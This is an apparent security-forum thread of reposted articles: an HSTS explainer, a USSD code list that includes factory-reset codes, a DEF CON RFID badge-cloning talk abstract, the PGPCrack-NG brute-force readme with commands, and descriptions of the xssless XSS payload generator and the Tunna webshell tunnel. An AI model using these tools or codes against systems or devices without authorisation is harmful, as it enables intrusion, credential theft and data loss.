a HSTS Host and to remove all policy. It does not imply an infinite max-age directive value. There is also an optional includeSubDomains directive that can be included at the discretion of the host such as ‘Strict-Transport-Security: max-age=31536000; includeSubDomains‘. This would, as expected, inform the UA that all subdomains are to be treated as HSTS Hosts also. Twitter’s HSTS Policy The HSTS response header should only be sent over a secure transport layer but UAs should ignore this header if received over HTTP. This is primarily because an attacker running a MiTM attack could maliciously strip out or inject this header into a HTTP response causing undesired behaviour. This however does present a very slim window of opportunity for an attacker in a targeted attack. Upon a user’s very first interaction with Twitter, the browser will have no knowledge of a HSTS Policy for the host. This will result in the first communication taking place over HTTP and not HTTPS. Once Twitter receives the request and replies with a redirect to a HTTPS version of the site, still using HTTP, an attacker could simply effect a MiTM attack against the victim as they would before. The viability of this form of attack however has, overall, been tremendously reduced. The only opportunity the attacker now has, is to be setup and prepared to intercept the very first communication ever with the host, or, wait until the HSTS policy expires after the victim has had no further communication with the host for the duration of the max-age directive. HSTS Header sent via HTTPS No HSTS Header sent via HTTP Once the user has initiated communications with a host that declares a valid HSTS Policy the UA will consider the host to be a HSTS Host for the duration of max-age and store the policy. During this time the UA will afford the user the following protections. 1. UAs transform insecure URI references to an HSTS Host into secure URI references before dereferencing them. 2. The UA terminates any secure transport connection attempts upon any and all secure transport errors or warnings. source Point 1 means that once Twitter has been accepted by the UA as a HSTS Host that the UA will replace any reference to http:// with https:// where the host is twitter.com (and it’s subdomains if specified) before it sends the request. This includes links found on any webpage that use http://, short cuts or bookmarks that may specify http:// and even user input such as the address bar. Even if http:// is explicitly defined as the protocol of choice the UA will enforce https://. Point 2 is also fairly important, if not as important as point 1. By terminating the connection as soon as a warning or error message is triggered the UA will prevent the user from clicking through them. This commonly happens when the user does not understand what the message is saying or because they are not concerned about the security of the connection. Many attacks are dependent on the poor manner in which users are informed of potential risk and the poor response from users to this warning. By simply terminating the connection when there is cause for any uncertainty provides the highest possible level of protection to the user. It even stops you accidentally clicking through an error message! So, once a user has a valid HSTS Policy in place, their request to http://twitter.com should go from something like this: Initial request uses HTTP with no HSTS policy enforced To something like this instead: All requests use HTTPS when HSTS is enforced This can also be verified using the Chrome Developer Tools. Open a new tab, click the Chrome Menu in the top right then select Tools -> Developer Tools and open the network tab. Now navigate to http://twitter.com (you must have visited the site before). You can see the initial request that would have gone to http://twitter.com is not sent and the browser immediately replaces that with a request to https://twitter.com instead. Request using HTTP is not sent HTTP request replaced with HTTPS equivalent HSTS In Practise Whilst not yet being widely deployed HSTS has started to make a more widespread appearance since the specification was published in Nov 2012. Below you can see that both Twitter and Facebook have the HSTS response header set, though Facebook doesn’t appear to have a very long max-age value. Twitter: Facebook: Out of interest I decided to check a selection of websites for high street banks and see if any had yet implemented a HSTS Policy. Having checked Barlcays, Halifax, HSBC, Nationwide, Natwest, RBS, Santander and Yorkshire Bank I was disappointed to find that none had yet implemented a HSTS Policy and some of them even have a dedicated online banking domain name. Preloaded HSTS It is also possible for a browser to ship with a preloaded list of HSTS Hosts. The Chrome and Firefox browsers both feature a built in list of sites that will always be treated as HSTS Hosts regardless of the presence of the HSTS response header. Websites can opt in to be included in the list of preloaded hosts and you can view the Chromium Source to see all the hosts already included. For sites preloaded in the browser there is no state where communications will take place that do not travel on a secure transport layer. Be that the initial communication, the first communication after wiping the local cache or any communication after a policy would have expired, the user cannot exchange data using HTTP. The browser will afford the protection of HSTS for the applicable hosts at all times. Unfortunately this solution isn’t really scalable considering the sheer potential for the number of sites that could be included. That said, if all financial institutions, government sites, social networks and any other potentially large target applied to be included, they could mitigate a substantial amount of risk. Conclusion HSTS has been a highly anticipated and a much needed solution to the problems of HTTP being the default protocol for a UA and the lack of an ability for a host to reliably enforce secure communications. For any site that issues permanent redirects to HTTPS the addition of the HSTS response header is a much safer way of enforcing secure communications for compliant UAs. By preventing the UA from sending even the very first request via HTTP, HSTS removes the only opportunity a MiTM has to gain a foothold in a secure transport layer. Scott. Short URL: http://scotthel.me/hsts Sursa: https://scotthelme.co.uk/hsts-the-missing-link-in-tls/
-
[REF] List of USSD codes! by kevhuff Thought I would compile a list of USSD codes for everyones reference. I have tested most if anybody has any to add please feel free. ****Warning some of these codes can be harmful( wipe data and ect.) I am not responsible for anything you do to your device**** Some of these codes may lead you to a menu use the option key (far left soft key) to navigate Some of the functions may be locked to our use but im still working on how to use these menus more extensively Information *#44336# Software Version Info *#1234# View SW Version PDA, CSC, MODEM *#12580*369# SW & HW Info *#197328640# Service Mode *#06# = IMEI Number. *#1234# = Firmware Version. *#2222# = H/W Version. *#8999*8376263# = All Versions Together. *#272*imei#* Product code *#*#3264#*#*- RAM version *#92782# = Phone Model *#*#9999#*#*= Phone/pda/csc info Testing *#07# Test History *#232339# WLAN Test Mode *#232331# Bluetooth Test Mode *#*#232331#*#*- Bluetooth test *#0842# Vibration Motor Test Mode *#0782# Real Time Clock Test *#0228# ADC Reading *#32489# (Ciphering Info) *#232337# Bluetooth Address *#0673# Audio Test Mode *#0*# General Test Mode *#3214789650# LBS Test Mode *#0289# Melody Test Mode *#0589# Light Sensor Test Mode *#0588# Proximity Sensor Test Mode *#7353# Quick Test Menu *#8999*8378# = Test Menu. *#*#0588#*#*- Proximity sensor test *#*#2664#*#*- Touch screen test *#*#0842#*#*- Vibration test* Network *7465625*638*# Configure Network Lock MCC/MNC #7465625*638*# Insert Network Lock Keycode *7465625*782*# Configure Network Lock NSP #7465625*782*# Insert Partitial Network Lock Keycode *7465625*77*# Insert Network Lock Keycode SP #7465625*77*# Insert Operator Lock Keycode *7465625*27*# Insert Network Lock Keycode NSP/CP #7465625*27*# Insert Content Provider Keycode *#7465625# View Phone Lock Status *#232338# WLAN MAC Address *#526# WLAN Engineering Mode -runs wlan tests (same as below) *#528# WLAN Engineering Mode *#2263# RF Band Selection-not sure about this one appears to be locked *#301279# HSDPA/HSUPA Control Menu---change HSDPA classes (opt. 1-5) Tools/Misc. *#*#1111#*#*- Service Mode #273283*255*663282*# Data Create SD Card *#4777*8665# = GPSR Tool. *#4238378# GCF Configuration *#1575# GPS Control Menu *#9090# Diagnostic Configuration *#7284# USB I2C Mode Control—mount to usb for storage/modem *#872564# USB Logging Control *#9900# System dump mode- can dump logs for debugging *#34971539# Camera Firmware Update *#7412365# Camera Firmware Menu *#273283*255*3282*# Data Create Menu- change sms, mms, voice, contact limits *2767*4387264636# Sellout SMS / PCODE view *#3282*727336*# Data Usage Status *#*#8255#*#*- Show GTalk service monitor-great source of info *#3214789# GCF Mode Status *#0283# Audio Loopback Control #7594# Remap Shutdown to End Call TSK *#272886# Auto Answer Selection ****SYSTEM*** USE CAUTION *#7780# Factory Reset *2767*3855# Full Factory Reset *#*#7780#*#* Factory data reset *#745# RIL Dump Menu *#746# Debug Dump Menu *#9900# System Dump Mode *#8736364# OTA Update Menu *#2663# TSP / TSK firmware update *#03# NAND Flash S/N BAM!!!! Sursa: [REF] List of USSD codes! [updated 10-30] - xda-developers
-
Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard Description: Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers — turning them into custom, long-range RFID hacking tools. This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas. Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few centimeter range of common RFID hacking tools. Some of the topics we will explore are: Overview of best RFID hacking tools available to get for your toolkit Stealing RFID proximity badge info from unsuspecting passers-by Replaying RFID badge info and creating fake cloned cards Brute-forcing higher privileged badge numbers to gain data center access Attacking badge readers and controllers directly Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access Creating custom RFID hacking tools using the Arduino Defending yourself from RFID hacking threats This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field. Francis Brown (@security_snacks) CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients. Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques. https://www.facebook.com/BishopFoxConsulting https://twitter.com/security_snacks For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard
-
PGPCrack-NG PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. It is a replacment for the long dead PGPCrack. PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. On Fedora 19, do sudo yum install libassuan-devel -y. On Ubuntu, do sudo apt-get libpth-dev libbz2-dev libassuan-dev. Compile using make. You might need to edit -I/usr/include/libassuan2 part in the Makefile. Run cat ~/magnum-jumbo/run/password.lst | ./PGPCrack-NG <PGP file> john -i -stdout | ./PGPCrack-NG <PGP file> Speed: > 1330 passwords / second on AMD X3 720 CPU @ 2.8GHz (using single core). Sursa si download: https://github.com/kholia/PGPCrack-NG
-
xssless – Automatic XSS Payload Generator After working with more and more complex Javascript payloads for XSS I realized that most of the work I was doing was unnecessary! I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks. Psst! If you already understand all of this stuff and don’t want to read this post click here for the github link. The XSS Vulnerability Once you have your initial XSS vulnerability found you’re basically there! Now you can do evil things like session hijacking and much more! But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless? Of course not! XSS Worms & JavaScript Payloads Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying same-domain, you’re good to go! How? JavaScript payloads of course! Not only are JavaScript payloads real, they are quite dangerous – people often write-up XSS as being a ‘low priority’ issue in security. This is simply not true, I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Less we forget how powerful the Samy Worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be. Building Complex Payloads Building payloads can be a real pain, custom coding every POST/GET request and parsing CSRF tokens all while debugging to ensure it works. After building a rather complex payload I realized this is pointless, why couldn’t a script do the same? xssless Work hard not smart, using xssless you can automatically generate payloads for any site quickly and efficiently. xssless generates payloads from Burp proxy exported requests, meaning you do your web actions in the browser though Burp and then export them into xssless. An Example Scenario Image if we had an XSS in reddit.com, of course we want to use this cool new exploit (because we lack morality and this is an example so bite me). We fire up Burp and set Firefox to use it as a proxy, now we just preform the web action we want to make a payload for. ... Click Here for the Github Page Sursa: xssless - Automatic XSS Payload Generator | The Hacker Blog
-
Overview Tunna is a tool designed to bypass firewall restrictions on remote webservers. It consists of a local application (supporting Ruby and Python) and a web application (supporting ASP.NET, Java and PHP). Description Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. The web application file must be uploaded on the remote server. It will be used to make a local connection with services running on the remote web server or any other server in the DMZ. The local application communicates with the webshell over the HTTP protocol. It also exposes a local port for the client application to connect to. Since all external communication is done over HTTP it is possible to bypass the filtering rules and connect to any service behind the firewall using the webserver on the other end. Tunna framework Tunna framework comes witht he following functionality: [TABLE=width: 90%, align: center] [TR] [TD][/TD] [TD=class: txt12]Ruby client - proxy bind: Ruby client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Python client - proxy bind: Python client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Metasploit integration module, which allows transparent execution of metasploit payloads on the server[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]ASP.NET remote script[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Java remote script[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]PHP remote script[/TD] [/TR] [/TABLE] Author Tunna has been developed by Nikos Vassakis. Download: http://www.secforce.com/research/tunna_download.html Sursa: SECFORCE :: Penetration Testing :: Research
-
[h=1]The Pirate Bay's Guyana Domain Goes Down[/h]December 19th, 2013, 08:31 GMT · By Gabriela Vatu - The Pirate Bay's new domain is no longer working The Pirate Bay has been on the run from domain to domain, changing quite a few over the past week. Only yesterday, the site left Peru and moved to the Republic of Guyana. Now, thepiratebay.gy is no longer working, although it’s uncertain if the domain was seized and the site has moved on to another location or there’s an issue with the servers. The site’s insiders said that the easiest way to access the Pirate Bay would be via its old domains over at .SE and .ORG, which would redirect users to the newest homepage, wherever that might be. However, this doesn’t seem to be working either for now. The site’s admins said yesterday that they already had a bunch of domains set up in case they needed to leave again, mentioning that there were about 70 more domains to choose from. Last week, Pirate Bay lost its .SX domain. From there, it moved to Ascension Island’s .AC for about a day, before going to the Peruvian domain. Yesterday, the site had to relocate to .GY. As soon as the site settles for a new domain, the blog will be updated, so check back soon. [uPDATE] The Pirate Bay site seems to be working on the Swedish .SE domain for now, but it looks like it's impossible to download any magnet links at the moment. Most likely, the torrent site is only passing through as it seeks to settle into a new domain. Sursa: The Pirate Bay's Guyana Domain Goes Down [uPDATE]